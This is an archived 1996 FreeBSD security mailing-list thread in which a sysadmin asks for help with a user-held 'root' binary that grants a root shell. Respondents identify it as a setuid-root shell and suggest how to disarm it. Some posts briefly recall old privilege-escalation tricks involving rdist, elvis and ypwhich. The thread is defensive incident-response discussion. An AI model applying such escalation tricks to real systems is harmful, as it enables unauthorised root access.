20:19:35 +0200 From: Wilko Bulte Message-Id: <199606241819.UAA01054@yedi.iaf.nl> X-Organisation: Private FreeBSD site - Arnhem - The Netherlands Subject: Re: I need help on this one - please help me track this guy down! To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Mon, 24 Jun 1996 20:19:35 +0200 (MET DST) Cc: guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org In-Reply-To: <10346.835598093@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 11:34:53 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk As Jordan K. Hubbard wrote... > > ip address. Unless of course you either block packets coming from localhost > > or block source routed packets. > > Oh yeah, also, David says both we and CRL (the ISP) block source > routed packets. > > Jordan This makes me wonder: can ijppp also block source routed packets? >From the man page I don't see how... Wilko _ __________________________________________________________________________ | / o / / _ Wilko Bulte email: wilko@yedi.iaf.nl |/|/ / / /( (_) Private FreeBSD site - Arnhem - The Netherlands -------------------------------------------------------------------------------- From owner-freebsd-security Mon Jun 24 12:37:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA24897 for security-outgoing; Mon, 24 Jun 1996 12:37:24 -0700 (PDT) Received: from soda.CSUA.Berkeley.EDU (soda.CSUA.Berkeley.EDU [128.32.43.52]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA24877; Mon, 24 Jun 1996 12:37:19 -0700 (PDT) Received: (from richardc@localhost) by soda.CSUA.Berkeley.EDU (8.6.12/8.6.12) id MAA14960; Mon, 24 Jun 1996 12:37:22 -0700 Date: Mon, 24 Jun 1996 12:37:18 -0700 (PDT) From: Veggy Vinny To: Wilko Bulte cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606241819.UAA01054@yedi.iaf.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Speaking about security, we are running a FreeBSD box and there is a guy that has this program that can get root shell as long as he has any account, can someone look into this and find out how he does it? Vince GaiaNet SysAdmin From owner-freebsd-security Mon Jun 24 13:17:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA27165 for security-outgoing; Mon, 24 Jun 1996 13:17:52 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA27143; Mon, 24 Jun 1996 13:17:12 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06237; Mon, 24 Jun 1996 22:13:46 +0200 (SAT) Message-Id: <199606242013.WAA06237@grumble.grondar.za> To: Veggy Vinny cc: Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! Date: Mon, 24 Jun 1996 22:13:31 +0200 From: Mark Murray Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Veggy Vinny wrote: > Speaking about security, we are running a FreeBSD box and there > is a guy that has this program that can get root shell as long as he has > any account, can someone look into this and find out how he does it? Take claims like this with a pinch of salt. ;-) What is the program? If we know how it works, we can fix any secuity hole it may be exploiting. M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 13:19:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA27560 for security-outgoing; Mon, 24 Jun 1996 13:19:47 -0700 (PDT) Received: from soda.CSUA.Berkeley.EDU (soda.CSUA.Berkeley.EDU [128.32.43.52]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA27519; Mon, 24 Jun 1996 13:19:39 -0700 (PDT) Received: (from richardc@localhost) by soda.CSUA.Berkeley.EDU (8.6.12/8.6.12) id NAA19341; Mon, 24 Jun 1996 13:19:28 -0700 Date: Mon, 24 Jun 1996 13:19:26 -0700 (PDT) From: Veggy Vinny To: Mark Murray cc: Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606242013.WAA06237@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Mark Murray wrote: > Veggy Vinny wrote: > > Speaking about security, we are running a FreeBSD box and there > > is a guy that has this program that can get root shell as long as he has > > any account, can someone look into this and find out how he does it? > > Take claims like this with a pinch of salt. ;-) I know but I tried it and it does let me run vipw ;-) > What is the program? If we know how it works, we can fix any secuity hole > it may be exploiting. Hmmm, the program is called root, no sources.. it's just a 278k binary... Cheers, -Vince- richardc@CSUA.Berkeley.EDU - vince@COSC.GOV - vince@cygnus.sy.yale.edu GUS Mailing Lists Admin - http://www.COSC.GOV/~vince UC Berkeley AstroPhysics (B.S.) - Electrical Engineering (Honorary B.S.) Chabot Observatory & Science Center - Oakland, California USA Computing Networking Operations - Advisory Council Member Running FreeBSD - Real UN*X for Free! Linda Wong/Vivian Chow/Hacken Lee/Danny Chan/Priscilla Chan Fan Club Mailing Lists Admin 1996 Estoril Blue BMW ///M3 - BMW CCA Member Golden Gate Chapter From owner-freebsd-security Mon Jun 24 13:24:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA28110 for security-outgoing; Mon, 24 Jun 1996 13:24:43 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA27993; Mon, 24 Jun 1996 13:23:25 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06267; Mon, 24 Jun 1996 22:15:38 +0200 (SAT) Message-Id: <199606242015.WAA06267@grumble.grondar.za> To: Wilko Bulte cc: jkh@time.cdrom.com (Jordan K. Hubbard), guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! Date: Mon, 24 Jun 1996 22:15:38 +0200 From: Mark Murray Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Wilko Bulte wrote: > > Oh yeah, also, David says both we and CRL (the ISP) block source > > routed packets. > > > > Jordan > > This makes me wonder: can ijppp also block source routed packets? > From the man page I don't see how... Not by itself, but if you turn on firewalling in your kernel you can. look at ipfirewall(4) and ipfw(8). M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 13:31:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA29015 for security-outgoing; Mon, 24 Jun 1996 13:31:50 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA28974; Mon, 24 Jun 1996 13:31:38 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06360; Mon, 24 Jun 1996 22:27:09 +0200 (SAT) Message-Id: <199606242027.WAA06360@grumble.grondar.za> To: Veggy Vinny cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! Date: Mon, 24 Jun 1996 22:27:09 +0200 From: Mark Murray Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Veggy Vinny wrote: > > Take claims like this with a pinch of salt. ;-) > > I know but I tried it and it does let me run vipw ;-) > > > What is the program? If we know how it works, we can fix any secuity hole > > it may be exploiting. > > Hmmm, the program is called root, no sources.. it's just a 278k > binary... With a setuid bit? Does ktrace(1) give any clues? What do you get from strings(1)? (Long shot..) What other exploration have you done? M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 13:36:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA29657 for security-outgoing; Mon, 24 Jun 1996 13:36:56 -0700 (PDT) Received: from soda.CSUA.Berkeley.EDU (soda.CSUA.Berkeley.EDU [128.32.43.52]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA29636; Mon, 24 Jun 1996 13:36:51 -0700 (PDT) Received: (from richardc@localhost) by soda.CSUA.Berkeley.EDU (8.6.12/8.6.12) id NAA20708; Mon, 24 Jun 1996 13:36:53 -0700 Date: Mon, 24 Jun 1996 13:36:51 -0700 (PDT) From: Veggy Vinny To: Mark Murray cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606242027.WAA06360@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Mark Murray wrote: > Veggy Vinny wrote: > > > Take claims like this with a pinch of salt. ;-) > > > > I know but I tried it and it does let me run vipw ;-) > > > > > What is the program? If we know how it works, we can fix any secuity hole > > > it may be exploiting. > > > > Hmmm, the program is called root, no sources.. it's just a 278k > > binary... > > With a setuid bit? Not too sure... > Does ktrace(1) give any clues? Nope... :-( > What do you get from strings(1)? (Long shot..) -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir listing. as for strings... it's really long... > What other exploration have you done? Not much really..... I do remember seeing someone like hack root using ypwhich and it worked too.... that was on 2.1R... -current seemed to fix it... Vince GaiaNet System Administration From owner-freebsd-security Mon Jun 24 13:46:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA00805 for security-outgoing; Mon, 24 Jun 1996 13:46:03 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA00798; Mon, 24 Jun 1996 13:45:54 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id WAA06435; Mon, 24 Jun 1996 22:43:37 +0200 (SAT) Message-Id: <199606242043.WAA06435@grumble.grondar.za> To: Veggy Vinny cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! Date: Mon, 24 Jun 1996 22:43:36 +0200 From: Mark Murray Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Veggy Vinny wrote: > > With a setuid bit? > > Not too sure... ls -al will tell you this. Come on :-) > > Does ktrace(1) give any clues? > > Nope... :-( > > > What do you get from strings(1)? (Long shot..) > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir ^ | This is a setuid prog. The program is owned by root, and is SETUID, therefore it will run as if it were root. It is probably a shell (bash, sh, csh) renamed to root and setuid. "chmod 755 root" will cut it down to size. > listing. as for strings... it's really long... Try me. Cut out the rubbish and the library crap. > > What other exploration have you done? > > Not much really..... I do remember seeing someone like hack root > using ypwhich and it worked too.... that was on 2.1R... -current seemed > to fix it... M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 14:02:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA02078 for security-outgoing; Mon, 24 Jun 1996 14:02:13 -0700 (PDT) Received: from ref.tfs.com (ref.tfs.com [140.145.254.251]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA02055; Mon, 24 Jun 1996 14:02:08 -0700 (PDT) Received: (from julian@localhost) by ref.tfs.com (8.7.5/8.7.3) id NAA01968; Mon, 24 Jun 1996 13:59:32 -0700 (PDT) Message-Id: <199606242059.NAA01968@ref.tfs.com> Subject: Re: I need help on this one - please help me track this guy down! To: richardc@CSUA.Berkeley.EDU (Veggy Vinny) Date: Mon, 24 Jun 1996 13:59:31 -0700 (PDT) From: "JULIAN Elischer" Cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org In-Reply-To: from "Veggy Vinny" at Jun 24, 96 01:36:51 pm X-Mailer: ELM [version 2.4 PL25 ME8b] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > > > On Mon, 24 Jun 1996, Mark Murray wrote: > > > > What do you get from strings(1)? (Long shot..) > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir ^ DUH! There was also the one that used rdist in daemon mode to rdist itself a new copy of /etc/passwd (and friends) I haven't looked recently to see if that still works for FreeBSD.. I last looked in 386BSD.. julian From owner-freebsd-security Mon Jun 24 14:57:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA09161 for security-outgoing; Mon, 24 Jun 1996 14:57:46 -0700 (PDT) Received: from andrew.cmu.edu (ANDREW.CMU.EDU [128.2.10.101]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA09155; Mon, 24 Jun 1996 14:57:39 -0700 (PDT) Received: (from postman@localhost) by andrew.cmu.edu (8.7.5/8.7.3) id RAA05938; Mon, 24 Jun 1996 17:52:27 -0400 Received: via switchmail; Mon, 24 Jun 1996 17:52:25 -0400 (EDT) Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 17:52:00 -0400 (EDT) Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 17:51:57 -0400 (EDT) Received: from mms.4.60.Jan.26.1995.18.43.47.sun4c.411.EzMail.2.0.CUILIB.3.45.SNAP.NOT.LINKED.unix13.andrew.cmu.edu.sun4c.411 via MS.5.6.unix13.andrew.cmu.edu.sun4c_411; Mon, 24 Jun 1996 17:51:57 -0400 (EDT) Message-ID: <4lnkrxe00YUpQCvVNx@andrew.cmu.edu> Date: Mon, 24 Jun 1996 17:51:57 -0400 (EDT) From: Matthew Jason White To: Veggy Vinny Subject: Re: I need help on this one - please help me track this guy down! Cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org In-Reply-To: <199606242043.WAA06435@grumble.grondar.za> References: <199606242043.WAA06435@grumble.grondar.za> Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one.. by Mark Murray@grondar.za > | This is a setuid prog. The program is owned by root, and is > SETUID, therefore it will run as if it were root. It is > probably a shell (bash, sh, csh) renamed to root and setuid. > "chmod 755 root" will cut it down to size. I think perhaps a better question to be asking is how this guy got a suid shell on that system. It could have been a booby-trapped program that got run as root, but one would hope that such a chintsy method wouldn't work on most systems. -Matt ----- Matt White Email: mwhite+@cmu.edu http://www.cs.cmu.edu/afs/cs/user/mwhite/www/ From owner-freebsd-security Mon Jun 24 15:00:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA09441 for security-outgoing; Mon, 24 Jun 1996 15:00:27 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA09429; Mon, 24 Jun 1996 15:00:19 -0700 (PDT) Received: from time.cdrom.com (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with ESMTP id OAA13542; Mon, 24 Jun 1996 14:58:47 -0700 (PDT) cc: Veggy Vinny , Mark Murray , Wilko Bulte , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 22:43:36 +0200." <199606242043.WAA06435@grumble.grondar.za> Date: Mon, 24 Jun 1996 14:58:47 -0700 Message-ID: <13540.835653527@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk If it's setuid root then this whole conversation is somewhat pointless, no? It's like saying "Somebody can break into my house!" and then having it pointed out that this isn't all that unusual given that the perpetrator has a full set of your housekeys and that your wife has been having an affair with him for months anyway and lets him in after you leave for work in the morning. :-) Jordan repl: bad addresses: Mark Murray -- no sub-domain in domain-part of address (@) > Veggy Vinny wrote: > > > With a setuid bit? > > > > Not too sure... > > ls -al will tell you this. Come on :-) > > > > Does ktrace(1) give any clues? > > > > Nope... :-( > > > > > What do you get from strings(1)? (Long shot..) > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ > | This is a setuid prog. The program is owned by root, and is > SETUID, therefore it will run as if it were root. It is > probably a shell (bash, sh, csh) renamed to root and setuid. > "chmod 755 root" will cut it down to size. > > > listing. as for strings... it's really long... > > Try me. Cut out the rubbish and the library crap. > > > > What other exploration have you done? > > > > Not much really..... I do remember seeing someone like hack root > > using ypwhich and it worked too.... that was on 2.1R... -current seemed > > to fix it... > > M > -- > Mark Murray > 46 Harvey Rd, Claremont, Cape Town 7700, South Africa > +27 21 61-3768 GMT+0200 > Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 15:09:15 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA10123 for security-outgoing; Mon, 24 Jun 1996 15:09:15 -0700 (PDT) Received: from palmer.demon.co.uk (palmer.demon.co.uk [158.152.50.150]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA10113; Mon, 24 Jun 1996 15:09:09 -0700 (PDT) Received: from palmer.demon.co.uk (localhost [127.0.0.1]) by palmer.demon.co.uk (sendmail/PALMER-2) with ESMTP id WAA26814; Mon, 24 Jun 1996 22:02:26 +0100 (BST) To: batie@agora.rdrop.com (Alan Batie) cc: dunn@harborcom.net, jaeger@com, hackers@FreeBSD.ORG, security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: I need help on this one - please help me track this guy In-reply-to: Your message of "Sun, 23 Jun 1996 21:11:59 PDT." Date: Mon, 24 Jun 1996 22:02:25 +0100 Message-ID: <26812.835650145@palmer.demon.co.uk> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Alan Batie wrote in message ID : > 11 slip-0.pu.ru (193.124.85.1) 581.747 ms 585.953 ms 509.617 ms > 12 nat.pu.ru (193.124.85.134) 579.649 ms 553.069 ms 569.455 ms > 13 gw.pu.ru (193.124.85.219) 565.162 ms 566.153 ms 579.921 ms > 14 * * * (localhost appeared here for Jordan) > If "nat" means what I think it does (Network Address Translation; recently > devised devices to translate IP addresses so private internal networks can > reuse addresses in the public space), it's probably an artifact of being > behind the NAT. On the otherhand, there was (for a LONG time) a `NAT' box at WC, which was actually a router... (Network Applicance or something? It's a while back now). That's probably what they have... Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jun 24 15:59:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA21972 for security-outgoing; Mon, 24 Jun 1996 15:59:21 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA21967; Mon, 24 Jun 1996 15:59:17 -0700 (PDT) Received: from localhost (scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) with SMTP id SAA27375; Mon, 24 Jun 1996 18:57:27 -0400 (EDT) Date: Mon, 24 Jun 1996 18:57:27 -0400 (EDT) From: Chris Watson To: "Jordan K. Hubbard" cc: Veggy Vinny , Mark Murray , Wilko Bulte , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <13540.835653527@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Jordan K. Hubbard wrote: I think it was just the russians trying to steal dysons numero uno VM technology. :) -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net http://www.freebsd.org | SysAdmin / Network Engineer / Security ===================================| Member BSDNET team! http://www.bsdnet.org From owner-freebsd-security Mon Jun 24 16:40:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA23870 for security-outgoing; Mon, 24 Jun 1996 16:40:26 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA23847; Mon, 24 Jun 1996 16:40:20 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA16166; Mon, 24 Jun 1996 16:39:39 -0700 (PDT) Date: Mon, 24 Jun 1996 16:39:39 -0700 (PDT) From: -Vince- To: Mark Murray cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606242043.WAA06435@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Mark Murray wrote: > Veggy Vinny wrote: > > > With a setuid bit? > > > > Not too sure... > > ls -al will tell you this. Come on :-) Hmmm, okay :-) > > > Does ktrace(1) give any clues? > > > > Nope... :-( > > > > > What do you get from strings(1)? (Long shot..) > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ > | This is a setuid prog. The program is owned by root, and is > SETUID, therefore it will run as if it were root. It is > probably a shell (bash, sh, csh) renamed to root and setuid. > "chmod 755 root" will cut it down to size. it does seem like sh or bash... > > listing. as for strings... it's really long... > > Try me. Cut out the rubbish and the library crap. Well, it's actually easier to mail you the binary... > > > What other exploration have you done? > > > > Not much really..... I do remember seeing someone like hack root > > using ypwhich and it worked too.... that was on 2.1R... -current seemed > > to fix it... Vince System Adminstration/GaiaNet Corporation From owner-freebsd-security Mon Jun 24 16:46:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24111 for security-outgoing; Mon, 24 Jun 1996 16:46:08 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24092; Mon, 24 Jun 1996 16:46:01 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA17026; Mon, 24 Jun 1996 16:45:42 -0700 (PDT) Date: Mon, 24 Jun 1996 16:45:42 -0700 (PDT) From: -Vince- To: JULIAN Elischer cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606242059.NAA01968@ref.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, JULIAN Elischer wrote: > > On Mon, 24 Jun 1996, Mark Murray wrote: > > > > > > > What do you get from strings(1)? (Long shot..) > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ DUH! > There was also the one that used rdist in daemon mode > to rdist itself a new copy of /etc/passwd (and friends) > > I haven't looked recently to see if that still works for FreeBSD.. > I last looked in 386BSD.. Oh well, I remember in Linux when there was 386 0.1... you can login as a regular user, run vi (elvis) on /etc/passwd and then suspend and then like recover and it would make a copy of /etc/passwd Vince GaiaNet System Administration From owner-freebsd-security Mon Jun 24 16:51:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24450 for security-outgoing; Mon, 24 Jun 1996 16:51:45 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24430; Mon, 24 Jun 1996 16:51:39 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA18004; Mon, 24 Jun 1996 16:51:19 -0700 (PDT) Date: Mon, 24 Jun 1996 16:51:19 -0700 (PDT) From: -Vince- To: "Jordan K. Hubbard" cc: Mark Murray , Wilko Bulte , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <13540.835653527@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Jordan K. Hubbard wrote: > If it's setuid root then this whole conversation is somewhat pointless, > no? It's like saying "Somebody can break into my house!" and then > having it pointed out that this isn't all that unusual given that the > perpetrator has a full set of your housekeys and that your wife has been > having an affair with him for months anyway and lets him in after you > leave for work in the morning. :-) Good one Jordan :-) But the thing is how did he get that binary there in the first place since if he can do that here, then he can do that on any machine that he doesn't have group wheel on to gain root access... I'll let John comment on this one :-) Vince System Administration - GaiaNet Corporation > repl: bad addresses: > Mark Murray -- no sub-domain in domain-part of address (@) > > Veggy Vinny wrote: > > > > With a setuid bit? > > > > > > Not too sure... > > > > ls -al will tell you this. Come on :-) > > > > > > Does ktrace(1) give any clues? > > > > > > Nope... :-( > > > > > > > What do you get from strings(1)? (Long shot..) > > > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > > ^ > > | This is a setuid prog. The program is owned by root, and is > > SETUID, therefore it will run as if it were root. It is > > probably a shell (bash, sh, csh) renamed to root and setuid. > > "chmod 755 root" will cut it down to size. > > > > > listing. as for strings... it's really long... > > > > Try me. Cut out the rubbish and the library crap. > > > > > > What other exploration have you done? > > > > > > Not much really..... I do remember seeing someone like hack root > > > using ypwhich and it worked too.... that was on 2.1R... -current seemed > > > to fix it... > > > > M > > -- > > Mark Murray > > 46 Harvey Rd, Claremont, Cape Town 7700, South Africa > > +27 21 61-3768 GMT+0200 > > Finger mark@grondar.za for PGP key > > From owner-freebsd-security Mon Jun 24 16:54:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24652 for security-outgoing; Mon, 24 Jun 1996 16:54:57 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24615; Mon, 24 Jun 1996 16:54:47 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA18594; Mon, 24 Jun 1996 16:54:26 -0700 (PDT) Date: Mon, 24 Jun 1996 16:54:26 -0700 (PDT) From: -Vince- To: Matthew Jason White cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <4lnkrxe00YUpQCvVNx@andrew.cmu.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Matthew Jason White wrote: > Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one.. > by Mark Murray@grondar.za > > | This is a setuid prog. The program is owned by root, and is > > SETUID, therefore it will run as if it were root. It is > > probably a shell (bash, sh, csh) renamed to root and setuid. > > "chmod 755 root" will cut it down to size. > > I think perhaps a better question to be asking is how this guy got a > suid shell on that system. It could have been a booby-trapped program > that got run as root, but 